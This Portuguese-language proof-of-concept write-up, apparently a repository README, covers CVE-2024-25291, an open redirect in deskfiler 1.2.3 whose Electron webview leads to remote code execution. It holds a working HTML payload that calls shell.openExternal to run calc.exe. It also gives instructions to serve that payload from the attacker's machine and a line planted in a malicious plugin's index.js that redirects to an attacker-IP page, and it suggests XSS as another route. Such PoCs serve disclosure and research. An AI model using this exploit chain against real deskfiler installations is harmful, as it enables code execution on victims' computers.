
deskfiler 1.2.3 Open Redirect exploit
Uma Prova de Conceito para a vulnerabilidade CVE-2024-25291.
deskfiler - 1.2.3 permite Electron webview na aplicação, resultando em execução remota de código. Neste repositório há um exemplo de aplicação vulnerável e um exploit de prova de conceito (POC) da mesma.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ Se quiser testar rapidamente, crie um servidor no PC do atacante com o seguinte código.
$ python -m http.server 80
Nota: ※ Neste momento, assume-se que o plug-in é um plug-in gerado pelo atacante, e é apenas um plug-in normal com um código adicionado para permitir o acesso ao servidor do atacante. BareBone foi selecionado para testes simples.

Em seguida, adicione o seguinte código ao arquivo index.js no caminho da pasta BareBone.
window.location='http://[attacker_ip]/hack.html'


Nesta PoC, utilizamos um plug-in; no entanto, acreditamos que com vetores de ataque alternativos, é possível alcançar Execução Remota de Código (RCE) de forma independente. Além disso, se existirem vulnerabilidades no lado do servidor, como XSS Armazenado, XSS Refletido, o RCE também é considerado viável.